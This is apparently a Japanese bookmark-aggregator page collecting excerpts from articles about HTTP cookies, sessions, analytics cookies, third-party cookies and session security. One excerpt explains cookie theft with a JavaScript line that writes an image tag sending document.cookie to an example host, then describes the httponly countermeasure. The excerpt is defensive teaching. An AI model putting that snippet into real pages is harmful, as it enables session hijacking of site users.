Google アナリティクスで使われるクッキーについて __utma / __utmb / __utmz - こせきの技術日記
公式な仕様は無さそう。ソースを読むのは厳しい。整形しただけでは全然読めなかった。 クッキー 4種類 現行バージョンの ga.js が使用するクッキーは、主に4つ。 __utma ユーザを識別。2年有効。 __utmb 今回のセッションを識別。30分有効。 __utmz どこから来たか。リファラ。6ヶ月有効。 __utmv カスタム変数。2年有効。 __utma, __utmb, __utmz は、ga.js が実行されたときに、無かったら作られる。 __utmv は、_setCustomVar() で作られる。 有効期間は、最後に更新した時点からカウントする。4つとも、GAにデータが送られる度に更新される。 たとえば __utma なら、ユーザが2年間サイトに来なかったら消える。2年以内に再度アクセスすると、そこからまた2年の有効期間が与えられる。 他に、 __utmc 古いバージョンであ
Cookieとセッションをちゃんと理解する - Qiita
引用/参考書籍 「よくわかるPHPの教科書」 「初めてのPHP5」 「パーフェクトPHP」 「体系的に学ぶ安全なWebアプリケーションの作り方」 「PHPスーパーサンプル」 「プロになるためのWeb技術入門」 インターネット上で情報をやりとりするということは、大事な内容をはがきに書いて相手に送るようなもの。その情報が相手に届くまでに誰に見られるかわからない。 概要 HTTPはステートレスなプロトコル。「状態」を持てない。 例えば、「ログイン」ページの場合、「ログインしているかどうか」のチェックをする必要がある。 NG例) http://www.littleforest.jp/itemlist?login=ok loginパラメータを調べてokかどうかを調べる。 →→パラメータを容易に改変できてしまう。 解決策として、Cookieとセッションを使う。 Chromeで、Cookieを確認するに
Cookieを盗む例とhttponly属性 at softelメモ
以下は、とても単純なJavascriptによる例。 document.write('<img src="http://example.com/?x=' +escape(document.cookie) + '">'); example.com に対してGET渡しでdocument.cookieが送信される。 取得されたcookieにセッションIDが含まれるとセッションIDが他人に知られるところとなる。 リンクを踏ませるなどの方法でHTML中に上のようなスクリプトを仕込むことができると、攻撃が成立する。 対策例 document.cookieで取得できてしまうから危険なのでは? → 発行するcookieにhttponly属性を付与して、document.cookieで取得できなくしよう WordPressでも以下のような書き方をしていた。PHP5.2.0で追加された第7引数でhttponly
第6回 便利で危険なCookieを見てみよう
あらためて言うまでもありませんが,インターネットは,とっても便利なものですね。でも,インターネットには,ウイルス,情報漏洩,なりすましによる詐欺など,様々な危険が潜んでいます。「危険の存在を知り,十分に注意して使いましょう!」とはよく言われることですが,存在を知っているだけでは,危険から身を守ることができません。危険が生じる仕組みを知っておく必要もあります。 今回は,インターネットで使われている「Cookie(クッキー)」の仕組みを知るための実験をやってみます。Cookieは,便利なものなのですが,ちょっと危険なものでもあります。 Cookieの実体は,どこにある? はじめに,Cookieとは何かを,簡単に説明しておきましょう。 何らかのWebページを閲覧すると,Webサーバーが皆さんのパソコンのメモリーやハードディスクに情報を書き込むことがあります。書き込むデータは,どのサイトにいつアク
「サードパーティクッキー」が危険な理由を正しく知りましょう
ユーザー認証を行なっているWebサイトでは、しばしば「クッキー(Cookie)を有効にする」ように注意を見かけます。他方で、アンチウイルスソフトではクッキーをスパイウェアとしてブロック/検出することがあります。クッキーはどのように使われているのか、どうした問題があるのかについてお話したいと思います。 自分自身で使うクッキー ~ ファーストパーティクッキーの問題点 クッキーは、ユーザーのPC内にWebブラウザが保存する情報です。その中身を簡単に説明すると「Webサイトの閲覧記録」で、「どのPCやIPアドレスから、どのURLにアクセスしたのか」などの情報が含まれています。含まれる情報には大きな差はありませんが、どこが発行したかにより、クッキーは2種類に分けられます。 1つ目は、閲覧しているURLのWebサーバーから発行されるもので、「ファーストパーティクッキー」と呼ばれます。ショッピングサイト
行動ターゲティング広告 - Wikipedia
この記事には複数の問題があります。改善やノートページでの議論にご協力ください。 出典がまったく示されていないか不十分です。内容に関する文献や情報源が必要です。(2021年3月) 古い情報を更新する必要があります。(2021年3月) 出典検索?: "行動ターゲティング広告" – ニュース · 書籍 · スカラー · CiNii · J-STAGE · NDL · dlib.jp · ジャパンサーチ · TWL 行動ターゲティング広告(こうどうターゲティングこうこく)とは、広告の対象となる顧客の行動履歴を元に顧客の興味関心を推測し、ターゲットを絞ってインターネット広告配信を行う手法。例えば、旅行関連のページを最近訪れたことがあったり、航空会社の広告をクリックしたことがあるユーザーは、「旅行」というジャンルに興味関心があると判定し、「旅行」関連の広告を配信するといったもの。ここでいう「行動」は、
とほほのCookie入門 - とほほのWWW入門
Cookie とは、以下のようなことを実現するための機構です。 訪問者がそのページに何回訪れたか記録して表示する。 通常モード、フレームモードなど、訪問者の好みを記録しておき、次回訪問時にその好みのモードで表示する。 掲示板やチャットで入力したユーザー名を記録しておき、次回訪問時にユーザー名の入力を省略する。 ログインによるセッションを維持する。 下記の仕様書が公開されています。 RFC2109: https://tools.ietf.org/html/rfc2109 (1997年2月) RFC2965: https://tools.ietf.org/html/rfc2965 (2000年10月) RFC6265: https://tools.ietf.org/html/rfc6265 (2011年4月) 上記のようなデータは CGI などを用いてサーバー側に記録することもできますが、Co
WordPress予期しない出力によりCookiesがブロック | 大阪web制作会社JPS-堺市
WordPress予期しない出力によりCookiesがブロック 2014年7月23日 WordPress 先日、WordPressを使用しての開発中に、下記のエラーが発生して ログインできない現象がありました。 同じ現象が現れた際の対処法を記載しておきますので、参考にしてみてください。 「エラー: 予期しない出力によりCookiesがブロックされました。ヘルプが必要な場合はこちらのドキュメンテーションを読むか、サポートフォーラムをご利用ください。」 このエラーは3.9 系で出るようになったようで、プラグインかテーマが原因らしい。 まずは、テーマを変更してみることに。。。。 エラーが消えた! といことは テーマに問題があるようです。 怪しげなのはエラーになる前に触っていたfunction.phpです。 ソースを確認しましたが、特に問題がある箇所もないように思えました。 が いろいろ調べてみる
クッキーとセッション管理
ご注意 このページでは,もし可能ならクッキーを使います。セッションクッキー(ブラウザを終了させれば消えるクッキー)です。 例 あなたは今回このページに 始めてですね(あるいはクッキーが保存されていませんね)。 再読み込みするか,別のページに行ってからもう一度このページを見てください。 <?php session_set_cookie_params(0, '/~okumura/'); session_start(); ?> <!DOCTYPE html> <html lang="ja"> <head> <meta charset="UTF-8"> <title>私のホームページ</title> <link rel="stylesheet" href="style.css"> </head> <body> <p>あなたは今回このページに <?php if (isset($_SESSION['c
.NETエンタープライズWebアプリケーション開発技術大全 Sessionオブジェクト(5/7) - @IT
.NETエンタープライズ Webアプリケーション開発技術大全 Sessionオブジェクト マイクロソフト コンサルティング本部 赤間 信幸 2004/07/15 4 パーソナライズ、セッション、認証済みアクセスの違いと使い分け Webアプリケーションの設計においてセッションと混同されやすい項目として、パーソナライズと認証がある。この3つ(パーソナライズとセッションと認証)は概念的に異なるものであり、これらを制御するクッキー情報も分けて取り扱うことが望ましい※14。 ※14 Windows DNA(ASP)ベースのシステムでは、Sessionデータの中にユーザの認証済み状態を格納する(Session("loginUser")=strUserNameなど)ことによって認証状態を管理している場合がよく見られる。もちろんこの手法で問題ないケースも少なくないが、多様なアプリケーションに対応できる柔軟
第1回 まずは「クッキー」を理解すべし
Webアプリケーションのぜい弱性がなかなかなくならない。メディアなどでも盛んに取り上げられているにもかかわらず,である。特に,セッション管理がからむアプリケーションのぜい弱性には,気付かないことが多い。具体的には「クロスサイト・リクエスト・フォージェリ」(CSRF),「セッション・フィクセーション」などである。これらはクロスサイト・スクリプティング,SQLインジェクションといった比較的メジャーなぜい弱性に比べて認知度が低く,対策も進んでいない。 原因の一つは,アプリケーションの開発者が原因を正しく理解していないこと。CSRFやセッション・フィクセーションについて言えば,セッション管理に使うクッキー(cookie)の動作を理解していないと対策が難しい。ところが最近の開発環境では,セッション管理の仕組みが隠ぺいされているため,必ずしもこの知識は要求されない。こうした開発者は容易にはぜい弱性に気
HTTP cookie - Wikipedia
HTTP cookie(エイチティーティーピークッキー)は、マジッククッキーの一種。単にクッキー(cookie)とも表記される。 RFC 6265などで定義されたHTTPにおけるウェブサーバとウェブブラウザ間で状態を管理する通信プロトコル、またそこで用いられるウェブブラウザに保存された情報のことを指す。ユーザ識別やセッション管理を実現する目的などに利用される。 概要[編集] HTTPは元来ハイパーテキストにおいて単にファイル転送を行うために開発されたため、同じURLへのアクセスならその状況によらず同一の情報源[1]を提供することが前提となっている。動的なコンテンツ生成の仕組みとしてフォームが導入されているが、これは要求に直接対応する応答だけに影響をおよぼす。言い換えるとHTTPでは、同じ瞬間に同じ内容の要求を行っていれば、そのクライアントが以前にどのような通信を行っていても区別されない。H
CakePHP Note:自動ログインその1
ブラウザを閉じた後でも自動的にログインできるようにログイン・フォームに「次回から自動的にログイン」「次回からログインを省略」「Remember me」などのチェックボックスが備わっているケースを良く見かけます。AuthComponentとCookieComponentを使って実装してみます。AuthComponentのページで説明した例の続きとして説明いたします。 その1では、Authenticationにある方法を紹介します。 自動ログイン機能とは 自動ログイン機能とは、ログインが必要なページにもユーザー名やパスワードの入力なしでアクセスできる便利な機能です。ログイン時に「次回から自動的にログイン」にチェックしてログインすると自動ログインが有効になります。クッキーが使えるブラウザのみ対応。 自動ログインの仕組み 「次回から自動的にログイン」にチェックしてログインしたユーザーのブラウ
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
「Webからの脅威」を攻略せよ――セッション管理編